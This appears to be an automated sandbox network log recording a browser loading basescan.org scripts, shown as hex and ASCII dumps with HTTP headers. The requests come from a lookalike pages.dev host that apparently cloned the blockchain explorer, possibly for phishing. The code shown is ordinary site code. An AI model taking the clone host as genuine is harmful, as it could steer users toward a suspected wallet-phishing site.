                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 6c 2d 2d 73 65 63 6f 6e 64 61 72 79 20 74 65 78 74 2d 64 61 72 6b 27 3e 22 2b 28 61 64 64 72 65 73 73 43 6f 6e 74 65 6e 74 2e 6c 65 6e 67 74 68 3e 32 35 3f 61 64 64 72 65 73 73 43 6f 6e 74 65 6e 74 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 32 35 29 2b 22 2e 2e 2e 22 3a 61 64 64 72 65 73 73 43 6f 6e 74 65 6e 74 29 2b 22 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 22 29 2e 61 70 70 65 6e 64 54 6f 28 75 6c 29 3b 7d 0a 65 6c 73 65 20 69 66 28 63 6f 6e 74 65 6e 74 54 79 70 65 3d 3d 3d 22 54 6f 6b 65 6e 73 20 28 45 52 43 20 32 30 29 22 7c 7c 63 6f 6e 74 65 6e 74 54 79 70 65 3d 3d 3d 22 54 6f 6b 65 6e 73 20 28 45 52 43 20 37 32 31 29 22 7c 7c 63 6f 6e 74 65 6e 74 54 79 70 65 3d 3d 3d 22 54 6f 6b 65 6e 73 20 28 45 52 43 20 31 31 35 35 29 22 29 7b 76 61 72 20
                                                                                                                                                                                                                                              Data Ascii: l--secondary text-dark'>"+(addressContent.length>25?addressContent.substring(0,25)+"...":addressContent)+"</span></div></a>").appendTo(ul);}else if(contentType==="Tokens (ERC 20)"||contentType==="Tokens (ERC 721)"||contentType==="Tokens (ERC 1155)"){var
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 61 70 70 65 6e 64 54 6f 28 75 6c 29 3b 7d 0a 65 6c 73 65 20 69 66 28 63 6f 6e 74 65 6e 74 54 79 70 65 3d 3d 3d 22 4c 61 62 65 6c 73 22 29 7b 72 65 74 75 72 6e 20 24 28 22 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 62 2d 32 27 3e 22 29 2e 61 70 70 65 6e 64 28 22 3c 61 20 63 6c 61 73 73 3d 27 65 74 68 65 72 2d 73 65 61 72 63 68 20 6d 65 64 69 61 20 72 6f 75 6e 64 65 64 20 70 2d 32 27 20 68 72 65 66 3d 27 6a 61 76 61 73 63 72 69 70 74 3a 3b 27 3e 3c 64 69 76 20 63 6c 61 73 73 3d 27 6d 65 2d 32 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 62 74 6e 20 62 74 6e 2d 69 63 6f 6e 20 62 74 6e 2d 73 6f 66 74 2d 73 65 63 6f 6e 64 61 72 79 20 72 6f 75 6e 64 65 64 2d 63 69 72 63 6c 65 27 3e 3c 69 20 63 6c 61 73 73 3d 27 66 61 20 66 61 2d 74 61 67 20 62 74 6e 2d 69 63 6f 6e 5f
                                                                                                                                                                                                                                              Data Ascii: appendTo(ul);}else if(contentType==="Labels"){return $("<li class='mb-2'>").append("<a class='ether-search media rounded p-2' href='javascript:;'><div class='me-2'><span class='btn btn-icon btn-soft-secondary rounded-circle'><i class='fa fa-tag btn-icon_
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 78 54 65 78 74 3d 24 28 22 23 65 6d 61 69 6c 53 75 62 73 63 72 69 62 65 4d 6f 64 61 6c 42 6f 78 54 65 78 74 22 29 0a 65 6c 45 6d 61 69 6c 53 75 62 73 63 72 69 62 65 4d 6f 64 61 6c 42 6f 78 54 65 78 74 2e 68 74 6d 6c 28 73 65 6c 66 2e 73 70 69 6e 6e 65 72 29 0a 65 6c 45 6d 61 69 6c 53 75 62 73 63 72 69 62 65 4d 6f 64 61 6c 42 6f 78 2e 6d 6f 64 61 6c 28 22 73 68 6f 77 22 29 0a 69 66 28 73 74 72 45 6d 61 69 6c 29 7b 69 66 28 73 65 6c 66 2e 76 61 6c 69 64 61 74 65 45 6d 61 69 6c 28 73 74 72 45 6d 61 69 6c 29 29 7b 73 65 6c 66 2e 73 75 62 73 63 72 69 62 65 4e 65 77 73 6c 65 74 74 65 72 28 73 74 72 45 6d 61 69 6c 2c 66 75 6e 63 74 69 6f 6e 28 64 61 74 61 29 7b 69 66 28 64 61 74 61 3d 3d 31 29 7b 65 6c 45 6d 61 69 6c 53 75 62 73 63 72 69 62 65 4d 6f 64 61 6c 42
                                                                                                                                                                                                                                              Data Ascii: xText=$("#emailSubscribeModalBoxText")elEmailSubscribeModalBoxText.html(self.spinner)elEmailSubscribeModalBox.modal("show")if(strEmail){if(self.validateEmail(strEmail)){self.subscribeNewsletter(strEmail,function(data){if(data==1){elEmailSubscribeModalB
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 6c 42 6f 78 54 65 78 74 2e 68 74 6d 6c 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 69 63 6f 6e 20 62 74 6e 2d 77 61 72 6e 69 6e 67 20 72 6f 75 6e 64 65 64 2d 63 69 72 63 6c 65 20 6d 62 2d 34 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 72 20 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 20 62 74 6e 2d 69 63 6f 6e 5f 5f 69 6e 6e 65 72 20 6c 65 61 64 22 3e 3c 2f 69 3e 3c 2f 64 69 76 3e 3c 68 35 20 63 6c 61 73 73 3d 22 68 34 20 6d 62 2d 30 22 3e 57 61 72 6e 69 6e 67 3c 2f 68 35 3e 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 30 22 3e 41 6e 20 75 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 27 29 7d 0a 65 6c 45
                                                                                                                                                                                                                                              Data Ascii: lBoxText.html('<div class="btn btn-icon btn-warning rounded-circle mb-4"><i class="far fa-exclamation-triangle btn-icon__inner lead"></i></div><h5 class="h4 mb-0">Warning</h5><p class="mb-0">An unexpected error occurred. Please try again later.</p>')}elE
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC133INData Raw: 5c 5c 2e 2c 3b 3a 5c 73 40 5c 22 5d 2b 29 2a 29 7c 28 5c 22 2e 2b 5c 22 29 29 40 28 28 5c 5b 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 2e 5b 30 2d 39 5d 7b 31 2c 33 7d 5c 5d 29 7c 28 28 5b 61 2d 7a 41 2d 5a 5c 2d 30 2d 39 5d 2b 5c 2e 29 2b 5b 61 2d 7a 41 2d 5a 5d 7b 32 2c 7d 29 29 24 2f 3b 72 65 74 75 72 6e 20 74 72 75 65 7d 2c 7d 3b
                                                                                                                                                                                                                                              Data Ascii: \\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;return true},};


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              125192.168.2.549872104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC601OUTGET /assets/js/custom/web3.min.js?v=0.5.2.2 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Tue, 19 Sep 2023 02:20:15 GMT
                                                                                                                                                                                                                                              ETag: W/"80d94ed39fead91:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 115316
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PRKXZT2aM1S3lEnjJt8OU1XaNU0WOzoWDHjQ0C2rPvgUtrFJCLw%2FyHu9YbhP9anwqdwxO3pdGt1cp6RNGwwOdZK8KhAtLgo5uxOE8F3EF2Edyrnc%2Bf8t8sXF2DZyNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e90d1f42ef-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC554INData Raw: 37 63 37 31 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 77 65 62 33 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 2e 57 65 62 33 3d 74 28 29 3a 65 2e 57 65 62
                                                                                                                                                                                                                                              Data Ascii: 7c71/*! For license information please see web3.min.js.LICENSE.txt */!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 3f 22 4f 62 6a 65 63 74 20 69 73 20 6e 6f 74 20 69 74 65 72 61 62 6c 65 2e 22 3a 22 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 20 69 73 20 6e 6f 74 20 64 65 66 69 6e 65 64 2e 22 29 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65 66 61 75 6c 74 3a 65 7d 7d 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 63 68 61 69 6e 73 3d 74 2e 5f 67 65 74 49 6e 69 74 69 61 6c 69 7a 65 64 43 68 61 69 6e 73 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 69 28 72 28 38 37 32 39 35 29 29 2c 61 3d 69 28 72 28 33 31 32 32 37 29 29 2c 73 3d 69 28 72 28 34 30 34 33 39 29 29 2c 75 3d 69 28
                                                                                                                                                                                                                                              Data Ascii: t?"Object is not iterable.":"Symbol.iterator is not defined.")},i=function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0}),t.chains=t._getInitializedChains=void 0;var o=i(r(87295)),a=i(r(31227)),s=i(r(40439)),u=i(
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 22 2c 72 28 36 31 32 35 30 29 5d 2c 5b 22 73 68 61 6e 67 68 61 69 22 2c 72 28 35 35 35 33 29 5d 2c 5b 22 6d 65 72 67 65 22 2c 72 28 38 38 36 34 38 29 5d 5d 7d 2c 33 38 36 33 3a 28 65 2c 74 2c 72 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 2c 69 3d 72 28 32 39 30 33 33 29 2e 42 75 66 66 65 72 2c 6f 3d 72 28 32 38 38 34 37 29 28 72 28 33 33 35 35 29 29 2c 61 3d 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6e 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 26 26 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 7d 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f
                                                                                                                                                                                                                                              Data Ascii: ",r(61250)],["shanghai",r(5553)],["merge",r(88648)]]},3863:(e,t,r)=>{"use strict";var n,i=r(29033).Buffer,o=r(28847)(r(3355)),a=(n=function(e,t){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){fo
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 65 2e 41 72 62 69 74 72 75 6d 52 69 6e 6b 65 62 79 54 65 73 74 6e 65 74 3d 22 61 72 62 69 74 72 75 6d 2d 72 69 6e 6b 65 62 79 2d 74 65 73 74 6e 65 74 22 2c 65 2e 78 44 61 69 43 68 61 69 6e 3d 22 78 2d 64 61 69 2d 63 68 61 69 6e 22 7d 28 66 3d 74 2e 43 75 73 74 6f 6d 43 68 61 69 6e 7c 7c 28 74 2e 43 75 73 74 6f 6d 43 68 61 69 6e 3d 7b 7d 29 29 2c 28 68 3d 74 2e 43 68 61 69 6e 7c 7c 28 74 2e 43 68 61 69 6e 3d 7b 7d 29 29 5b 68 2e 4d 61 69 6e 6e 65 74 3d 31 5d 3d 22 4d 61 69 6e 6e 65 74 22 2c 68 5b 68 2e 52 6f 70 73 74 65 6e 3d 33 5d 3d 22 52 6f 70 73 74 65 6e 22 2c 68 5b 68 2e 52 69 6e 6b 65 62 79 3d 34 5d 3d 22 52 69 6e 6b 65 62 79 22 2c 68 5b 68 2e 4b 6f 76 61 6e 3d 34 32 5d 3d 22 4b 6f 76 61 6e 22 2c 68 5b 68 2e 47 6f 65 72 6c 69 3d 35 5d 3d 22 47 6f 65
                                                                                                                                                                                                                                              Data Ascii: e.ArbitrumRinkebyTestnet="arbitrum-rinkeby-testnet",e.xDaiChain="x-dai-chain"}(f=t.CustomChain||(t.CustomChain={})),(h=t.Chain||(t.Chain={}))[h.Mainnet=1]="Mainnet",h[h.Ropsten=3]="Ropsten",h[h.Rinkeby=4]="Rinkeby",h[h.Kovan=42]="Kovan",h[h.Goerli=5]="Goe
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 7d 7d 72 65 74 75 72 6e 20 61 2e 5f 68 61 72 64 66 6f 72 6b 3d 61 2e 44 45 46 41 55 4c 54 5f 48 41 52 44 46 4f 52 4b 2c 74 2e 73 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 73 26 26 28 61 2e 5f 73 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 73 3d 74 2e 73 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 73 29 2c 74 2e 68 61 72 64 66 6f 72 6b 26 26 61 2e 73 65 74 48 61 72 64 66 6f 72 6b 28 74 2e 68 61 72 64 66 6f 72 6b 29 2c 74 2e 65 69 70 73 26 26 61 2e 73 65 74 45 49 50 73 28 74 2e 65 69 70 73 29 2c 61 7d 72 65 74 75 72 6e 20 61 28 74 2c 65 29 2c 74 2e 63 75 73 74 6f 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 72 29 7b 76 61 72 20 6e 3b 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 7b 7d 29 3b 76 61 72 20 69 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 72 2e 62 61
                                                                                                                                                                                                                                              Data Ascii: }}return a._hardfork=a.DEFAULT_HARDFORK,t.supportedHardforks&&(a._supportedHardforks=t.supportedHardforks),t.hardfork&&a.setHardfork(t.hardfork),t.eips&&a.setEIPs(t.eips),a}return a(t,e),t.custom=function(e,r){var n;void 0===r&&(r={});var i=null!==(n=r.ba
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 43 68 61 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 3b 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 7c 7c 79 2e 42 4e 2e 69 73 42 4e 28 65 29 29 7b 76 61 72 20 69 3b 69 3d 74 68 69 73 2e 5f 63 75 73 74 6f 6d 43 68 61 69 6e 73 26 26 74 68 69 73 2e 5f 63 75 73 74 6f 6d 43 68 61 69 6e 73 2e 6c 65 6e 67 74 68 3e 30 26 26 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 68 69 73 2e 5f 63 75 73 74 6f 6d 43 68 61 69 6e 73 5b 30 5d 29 3f 74 68 69 73 2e 5f 63 75 73 74 6f 6d 43 68 61 69 6e 73 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 30 5d 7d 29 29 3a 74 68 69 73 2e 5f 63 75 73 74 6f 6d 43 68 61 69 6e 73 2c 74 68 69 73 2e 5f 63
                                                                                                                                                                                                                                              Data Ascii: tChain=function(e){var r,n;if("number"==typeof e||"string"==typeof e||y.BN.isBN(e)){var i;i=this._customChains&&this._customChains.length>0&&Array.isArray(this._customChains[0])?this._customChains.map((function(e){return e[0]})):this._customChains,this._c
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 79 2e 74 6f 54 79 70 65 29 28 65 2c 79 2e 54 79 70 65 4f 75 74 70 75 74 2e 42 4e 29 2c 74 3d 74 3f 28 30 2c 79 2e 74 6f 54 79 70 65 29 28 74 2c 79 2e 54 79 70 65 4f 75 74 70 75 74 2e 42 4e 29 3a 76 6f 69 64 20 30 3b 76 61 72 20 69 2c 6f 2c 61 2c 73 3d 63 2e 43 68 61 69 6e 73 74 61 72 74 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 66 3d 75 28 74 68 69 73 2e 68 61 72 64 66 6f 72 6b 73 28 29 29 2c 64 3d 66 2e 6e 65 78 74 28 29 3b 21 64 2e 64 6f 6e 65 3b 64 3d 66 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 6c 3d 64 2e 76 61 6c 75 65 3b 69 66 28 6e 75 6c 6c 21 3d 3d 6c 2e 62 6c 6f 63 6b 29 65 2e 67 74 65 28 6e 65 77 20 79 2e 42 4e 28 6c 2e 62 6c 6f 63 6b 29 29 26 26 28 73 3d 6c 2e 6e 61 6d 65 29 2c 74 26 26 6c 2e 74 64 26 26 28 74 2e 67 74 65 6e 28 6c 2e 74 64 29 3f 69
                                                                                                                                                                                                                                              Data Ascii: y.toType)(e,y.TypeOutput.BN),t=t?(0,y.toType)(t,y.TypeOutput.BN):void 0;var i,o,a,s=c.Chainstart;try{for(var f=u(this.hardforks()),d=f.next();!d.done;d=f.next()){var l=d.value;if(null!==l.block)e.gte(new y.BN(l.block))&&(s=l.name),t&&l.td&&(t.gten(l.td)?i
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 21 6f 2e 64 6f 6e 65 26 26 28 72 3d 69 2e 72 65 74 75 72 6e 29 26 26 72 2e 63 61 6c 6c 28 69 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 74 29 74 68 72 6f 77 20 74 2e 65 72 72 6f 72 7d 7d 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 48 61 72 64 66 6f 72 6b 20 22 2b 65 2b 22 20 6e 6f 74 20 64 65 66 69 6e 65 64 20 66 6f 72 20 63 68 61 69 6e 20 22 2b 74 68 69 73 2e 63 68 61 69 6e 4e 61 6d 65 28 29 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 53 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 72 3b 69 66 28 21 28 74 68 69 73 2e 5f 73 75 70 70 6f 72 74 65 64 48 61 72 64 66 6f 72 6b 73 2e 6c 65 6e 67 74 68 3e 30 29 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6e 3d 75 28 74
                                                                                                                                                                                                                                              Data Ascii: !o.done&&(r=i.return)&&r.call(i)}finally{if(t)throw t.error}}throw new Error("Hardfork "+e+" not defined for chain "+this.chainName())},t.prototype._isSupportedHardfork=function(e){var t,r;if(!(this._supportedHardforks.length>0))return!0;try{for(var n=u(t
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 61 72 61 6d 42 79 48 61 72 64 66 6f 72 6b 28 65 2c 74 2c 74 68 69 73 2e 5f 68 61 72 64 66 6f 72 6b 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 61 72 61 6d 42 79 48 61 72 64 66 6f 72 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 2c 69 2c 6f 2c 61 3b 72 3d 74 68 69 73 2e 5f 63 68 6f 6f 73 65 48 61 72 64 66 6f 72 6b 28 72 29 3b 76 61 72 20 73 3d 6e 75 6c 6c 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 66 3d 75 28 6d 2e 68 61 72 64 66 6f 72 6b 73 29 2c 63 3d 66 2e 6e 65 78 74 28 29 3b 21 63 2e 64 6f 6e 65 3b 63 3d 66 2e 6e 65 78 74 28 29 29 7b 76 61 72 20 64 3d 63 2e 76 61 6c 75 65 3b 69 66 28 22 65 69 70 73 22 69 6e 20 64 5b 31 5d 29 7b 76 61 72 20 6c 3d 64 5b 31 5d 2e 65 69 70 73 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 68 3d 28 6f 3d 76
                                                                                                                                                                                                                                              Data Ascii: aramByHardfork(e,t,this._hardfork)},t.prototype.paramByHardfork=function(e,t,r){var n,i,o,a;r=this._chooseHardfork(r);var s=null;try{for(var f=u(m.hardforks),c=f.next();!c.done;c=f.next()){var d=c.value;if("eips"in d[1]){var l=d[1].eips;try{for(var h=(o=v
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC1369INData Raw: 74 69 76 65 4f 6e 42 6c 6f 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3b 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 7b 7d 29 2c 74 3d 28 30 2c 79 2e 74 6f 54 79 70 65 29 28 74 2c 79 2e 54 79 70 65 4f 75 74 70 75 74 2e 42 4e 29 3b 76 61 72 20 69 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 72 2e 6f 6e 6c 79 53 75 70 70 6f 72 74 65 64 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 26 26 6e 3b 65 3d 74 68 69 73 2e 5f 63 68 6f 6f 73 65 48 61 72 64 66 6f 72 6b 28 65 2c 69 29 3b 76 61 72 20 6f 3d 74 68 69 73 2e 68 61 72 64 66 6f 72 6b 42 6c 6f 63 6b 42 4e 28 65 29 3b 72 65 74 75 72 6e 21 28 21 6f 7c 7c 21 74 2e 67 74 65 28 6f 29 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 61 63 74 69 76 65 4f 6e 42 6c 6f 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                                                                                                                                                                                                              Data Ascii: tiveOnBlock=function(e,t,r){var n;void 0===r&&(r={}),t=(0,y.toType)(t,y.TypeOutput.BN);var i=null!==(n=r.onlySupported)&&void 0!==n&&n;e=this._chooseHardfork(e,i);var o=this.hardforkBlockBN(e);return!(!o||!t.gte(o))},t.prototype.activeOnBlock=function(e,t


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              126192.168.2.549874104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC602OUTGET /assets/js/custom/commonjs.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:08 UTC878INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:08 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Content-Length: 51879
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=78233
                                                                                                                                                                                                                                              ETag: "5dced1182fe2da1:0"
                                                                                                                                                                                                                                              Last-Modified: Tue, 30 Jul 2024 03:18:06 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58864
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3QAGfvHgyzlLFR482FfDHOiWqlhIUgRnz348Kr%2B3AIgrX2SxpcL6QjM7kNMgZ96qGwtF8ly1%2BRzShxxqMXnbGjLEWnI%2FzR%2BanaLGV6MUXxAXPeyZPIWY66slJraKvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2e8fdc27cf0-EWR
